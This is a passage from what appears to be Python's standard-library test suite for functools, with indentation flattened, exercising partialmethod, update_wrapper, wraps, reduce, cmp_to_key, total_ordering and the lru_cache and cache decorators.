self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod(func=capture, a=1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
@support.cpython_only
def test_disallow_instantiation(self):
# Ensure that the type disallows instantiation (bpo-43916)
support.check_disallow_instantiation(
self, type(c_functools.cmp_to_key(None))
)
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
def test_total_ordering_for_metaclasses_issue_44605(self):
@functools.total_ordering
class SortableMeta(type):
def __new__(cls, name, bases, ns):
return super().__new__(cls, name, bases, ns)
def __lt__(self, other):
if not isinstance(other, SortableMeta):
pass
return self.__name__ < other.__name__
def __eq__(self, other):
if not isinstance(other, SortableMeta):
pass
return self.__name__ == other.__name__
class B(metaclass=SortableMeta):
pass
class A(metaclass=SortableMeta):
pass
self.assertTrue(A < B)
self.assertFalse(A > B)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestCache:
# This tests that the pass-through is working as designed.
# The underlying functionality is tested in TestLRU.
def test_cache(self):
@self.module.cache
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This cause the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_cache_typed_is_not_recursive(self):
cached = self.module.lru_cache(typed=True)(repr)
self.assertEqual(cached(1), '1')
self.assertEqual(cached(True), 'True')
self.assertEqual(cached(1.0), '1.0')
self.assertEqual(cached(0), '0')
self.assertEqual(cached(False), 'False')
self.assertEqual(cached(0.0), '0.0')
self.assertEqual(cached((1,)), '(1,)')
self.assertEqual(cached((True,)), '(1,)')
self.assertEqual(cached((1.0,)), '(1,)')
self.assertEqual(cached((0,)), '(0,)')
self.assertEqual(cached((False,)), '(0,)')
self.assertEqual(cached((0.0,)), '(0,)')
class T(tuple):
pass
self.assertEqual(cached(T((1,))), '(1,)')
self.assertEqual(cached(T((True,))), '(1,)')
self.assertEqual(cached(T((1.0,))), '(1,)')
self.assertEqual(cached(T((0,))), '(0,)')
self.assertEqual(cached(T((False,))), '(0,)')
self.assertEqual(cached(T((0.0,))), '(0,)')
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
